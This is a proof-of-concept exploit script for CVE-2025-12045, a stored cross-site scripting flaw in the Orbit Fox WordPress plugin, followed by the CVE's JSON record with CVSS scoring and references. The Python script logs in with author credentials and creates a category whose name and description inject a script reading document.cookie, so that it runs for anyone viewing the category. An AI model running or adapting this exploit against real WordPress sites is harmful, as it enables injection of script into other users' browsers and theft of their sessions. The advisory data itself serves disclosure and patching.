CVE-2025-12045

# CVE-2025-12045 PoC - Orbit Fox Plugin Stored XSS # Affected: Orbit Fox plugin <= 3.0.2 for WordPress # Type: Stored Cross-Site Scripting (XSS) # Required: Author-level access or higher import requests import sys from urllib.parse import quote target_url = input("Enter WordPress URL: ") username = input("Enter username: ") password = input("Enter password: ") session = requests.Session() # Step 1: Login to WordPress login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/" } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") sys.exit(1) print("[+] Login successful") # Step 2: Create malicious category with XSS payload category_url = f"{target_url}/wp-admin/admin-ajax.php" xss_payload = '<script>alert(document.cookie)</script>' category_data = { 'action': 'add-tag', 'taxonomy': 'category', 'post_type': 'post', 'tag-name': xss_payload, 'description': xss_payload } response = session.post(category_url, data=category_data) if 'created' in response.text or response.status_code == 200: print("[+] Malicious category created successfully") print(f"[+] Payload: {xss_payload}") print("[+] XSS will execute when category is displayed") else: print("[-] Failed to create category") print(f"[-] Response: {response.text}")

{"cve": {"id": "CVE-2025-12045", "sourceIdentifier": "[email protected]", "published": "2025-11-04T12:15:35.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts & More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the category and tag 'name' parameters in all versions up to, and including, 3.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/obfx_modules/elementor-extra-widgets/widgets/elementor/posts-grid.php#L1878", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/themeisle-companion/trunk/obfx_modules/elementor-extra-widgets/widgets/elementor/posts-grid.php#L1912", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3388856/", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2025-12045/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/139a264b-082b-45db-ac9e-4974bf86c56f?source=cve", "source": "[email protected]"}]}}